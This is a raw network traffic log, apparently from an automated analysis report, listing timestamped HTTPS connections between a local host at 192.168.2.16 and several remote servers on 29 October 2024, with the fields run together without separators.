                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.401387930 CET44349712192.0.73.2192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.401458025 CET49712443192.168.2.16192.0.73.2
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.401880980 CET49712443192.168.2.16192.0.73.2
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.401900053 CET44349712192.0.73.2192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.417424917 CET49723443192.168.2.16192.0.73.2
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.417478085 CET44349723192.0.73.2192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.417556047 CET49723443192.168.2.16192.0.73.2
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.417778969 CET49723443192.168.2.16192.0.73.2
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.417793989 CET44349723192.0.73.2192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.834094048 CET4968980192.168.2.16192.229.211.108
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.919439077 CET44349715192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.919750929 CET49715443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.919771910 CET44349715192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.920140028 CET44349715192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.920532942 CET49715443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.920614958 CET49715443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.920624018 CET44349715192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.938386917 CET44349716192.0.78.13192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.938642025 CET49716443192.168.2.16192.0.78.13
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.938678980 CET44349716192.0.78.13192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.939764977 CET44349716192.0.78.13192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.939855099 CET49716443192.168.2.16192.0.78.13
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.940114021 CET49716443192.168.2.16192.0.78.13
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.940179110 CET44349716192.0.78.13192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.940233946 CET49716443192.168.2.16192.0.78.13
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.951275110 CET44349718192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.951478004 CET49718443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.951503038 CET44349718192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.952579021 CET44349718192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.952733994 CET49718443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.952884912 CET49718443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.952964067 CET44349718192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.952999115 CET49718443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.953926086 CET44349717192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.954103947 CET49717443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.954130888 CET44349717192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.954468966 CET44349717192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.955384970 CET49717443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.955456018 CET44349717192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.955554962 CET49717443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.959336042 CET44349720192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.959563017 CET49720443192.168.2.16192.0.76.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.959575891 CET44349720192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.960612059 CET44349720192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.960681915 CET49720443192.168.2.16192.0.76.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.961536884 CET49720443192.168.2.16192.0.76.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.961615086 CET44349720192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.961680889 CET49720443192.168.2.16192.0.76.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.961688995 CET44349720192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.963330984 CET44349715192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.969712019 CET44349719192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.969918013 CET49719443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.969942093 CET44349719192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.970980883 CET44349719192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.971051931 CET49719443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.971288919 CET49719443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.971357107 CET44349719192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.971369028 CET49719443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.973469973 CET49715443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.975827932 CET44349721192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.976013899 CET49721443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.976030111 CET44349721192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.977104902 CET44349721192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.977169991 CET49721443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.977896929 CET49721443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.977955103 CET44349721192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.978028059 CET49721443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.978037119 CET44349721192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.980232000 CET44349722192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.980624914 CET49722443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.980640888 CET44349722192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.983344078 CET44349716192.0.78.13192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.984205008 CET44349722192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.984622955 CET49722443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.984622955 CET49722443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.984623909 CET49722443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.984644890 CET44349722192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.984698057 CET44349722192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.989394903 CET49716443192.168.2.16192.0.78.13
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.989415884 CET44349716192.0.78.13192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:42.995333910 CET44349718192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.003329992 CET44349717192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.005414963 CET49718443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.005412102 CET49720443192.168.2.16192.0.76.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.005434990 CET44349718192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.019340038 CET44349719192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.021419048 CET49721443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.021420956 CET49719443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.021435022 CET44349719192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.036425114 CET49722443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.036433935 CET49716443192.168.2.16192.0.78.13
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.036453009 CET44349722192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.038635015 CET44349723192.0.73.2192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.038862944 CET49723443192.168.2.16192.0.73.2
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.038883924 CET44349723192.0.73.2192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.042454004 CET44349723192.0.73.2192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.042551041 CET49723443192.168.2.16192.0.73.2
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.042952061 CET49723443192.168.2.16192.0.73.2
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.043065071 CET49723443192.168.2.16192.0.73.2
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.043138981 CET44349723192.0.73.2192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.049901962 CET44349715192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.049993992 CET44349715192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.050770044 CET49715443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.051139116 CET49715443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.051172972 CET44349715192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.051403999 CET49718443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.064495087 CET49725443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.064532042 CET44349725192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.064601898 CET49725443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.064781904 CET49725443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.064798117 CET44349725192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.067404032 CET49719443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.072994947 CET44349716192.0.78.13192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.073065996 CET44349716192.0.78.13192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.073129892 CET49716443192.168.2.16192.0.78.13
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.073132038 CET44349716192.0.78.13192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.073180914 CET49716443192.168.2.16192.0.78.13
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.073626995 CET49716443192.168.2.16192.0.78.13
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.073646069 CET44349716192.0.78.13192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.080343008 CET44349718192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.080399990 CET44349718192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.080435991 CET44349718192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.080467939 CET44349718192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.080490112 CET49718443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.080516100 CET44349718192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.080532074 CET49718443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.080681086 CET44349718192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.080710888 CET44349718192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.080760002 CET49718443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.080775023 CET44349718192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.080817938 CET49718443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.081001997 CET44349718192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.081008911 CET49718443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.081043005 CET49718443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.082906961 CET49726443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.082943916 CET44349726192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.083025932 CET49726443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.083224058 CET49726443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.083235979 CET44349726192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.083391905 CET49722443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.083410025 CET49723443192.168.2.16192.0.73.2
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.083425999 CET44349723192.0.73.2192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.084978104 CET44349717192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.085022926 CET44349717192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.085047960 CET44349717192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.085083008 CET49717443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.085098982 CET44349717192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.085278988 CET44349717192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.085318089 CET49717443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.085324049 CET44349717192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.085372925 CET49717443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.085824966 CET49717443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.085860968 CET44349717192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.085911036 CET49717443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.089591980 CET44349720192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.089633942 CET44349720192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.089689016 CET44349720192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.089692116 CET49720443192.168.2.16192.0.76.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.089700937 CET44349720192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.089740038 CET49720443192.168.2.16192.0.76.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.089754105 CET44349720192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.089787960 CET44349720192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.089898109 CET44349720192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.089931965 CET44349720192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.089945078 CET49720443192.168.2.16192.0.76.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.089951992 CET44349720192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.089975119 CET49720443192.168.2.16192.0.76.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.091015100 CET49727443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.091043949 CET44349727192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.091133118 CET49727443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.091622114 CET49727443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.091639042 CET44349727192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.098738909 CET49731443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.098762989 CET44349731192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.098896980 CET49731443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.099088907 CET49731443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.099103928 CET44349731192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.102904081 CET44349719192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.103035927 CET44349719192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.103090048 CET49719443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.103111029 CET44349719192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.103194952 CET44349719192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.103281021 CET49719443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.103286028 CET44349719192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.103331089 CET44349719192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.103435040 CET49719443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.103441000 CET44349719192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.107336998 CET44349721192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.107388973 CET44349721192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.107423067 CET44349721192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.107460022 CET44349721192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.107472897 CET49721443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.107486963 CET44349721192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.107501984 CET49721443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.107628107 CET44349721192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.107661009 CET44349721192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.107706070 CET49721443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.107718945 CET44349721192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.107815027 CET49721443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.108197927 CET44349721192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.108341932 CET44349719192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.108416080 CET49719443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.108424902 CET44349719192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.108447075 CET44349719192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.108495951 CET49719443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.110553026 CET44349722192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.110728979 CET44349722192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.110793114 CET49722443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.110795975 CET44349722192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.110826969 CET44349722192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.110985994 CET44349722192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.111035109 CET49722443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.111046076 CET44349722192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.111084938 CET49722443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.111090899 CET44349722192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.116465092 CET44349722192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.118773937 CET49722443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.118786097 CET44349722192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.131444931 CET49720443192.168.2.16192.0.76.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.132242918 CET49723443192.168.2.16192.0.73.2
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.147427082 CET49721443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.163427114 CET49722443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.170644999 CET44349723192.0.73.2192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.170690060 CET44349723192.0.73.2192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.170717955 CET44349723192.0.73.2192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.170747042 CET49723443192.168.2.16192.0.73.2
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.170761108 CET44349723192.0.73.2192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.170813084 CET49723443192.168.2.16192.0.73.2
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.170823097 CET44349723192.0.73.2192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.171224117 CET44349723192.0.73.2192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.171267986 CET49723443192.168.2.16192.0.73.2
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.171274900 CET44349723192.0.73.2192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.171864986 CET44349723192.0.73.2192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.171937943 CET49723443192.168.2.16192.0.73.2
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.171947002 CET44349723192.0.73.2192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.200948000 CET44349720192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.201195002 CET44349720192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.201277018 CET49720443192.168.2.16192.0.76.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.201347113 CET49720443192.168.2.16192.0.76.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.201368093 CET44349720192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.211402893 CET49723443192.168.2.16192.0.73.2
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.213439941 CET49732443192.168.2.16192.0.76.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.213479042 CET44349732192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.213541031 CET49732443192.168.2.16192.0.76.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.213975906 CET49733443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.214005947 CET44349733192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.214065075 CET49733443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.214129925 CET49732443192.168.2.16192.0.76.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.214153051 CET44349732192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.214611053 CET49733443192.168.2.16192.0.77.32
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.214622974 CET44349733192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.215593100 CET49734443192.168.2.16192.0.73.2
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.215622902 CET44349734192.0.73.2192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.215677977 CET49734443192.168.2.16192.0.73.2
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.215903044 CET49734443192.168.2.16192.0.73.2
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.215918064 CET44349734192.0.73.2192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.218650103 CET44349721192.0.77.32192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.221093893 CET49735443192.168.2.16192.0.76.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.221132994 CET44349735192.0.76.3192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.221199036 CET49735443192.168.2.16192.0.76.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.221309900 CET49736443192.168.2.16192.0.76.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.221309900 CET49737443192.168.2.16192.0.76.3
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:09:43.221347094 CET44349737192.0.76.3192.168.2.16
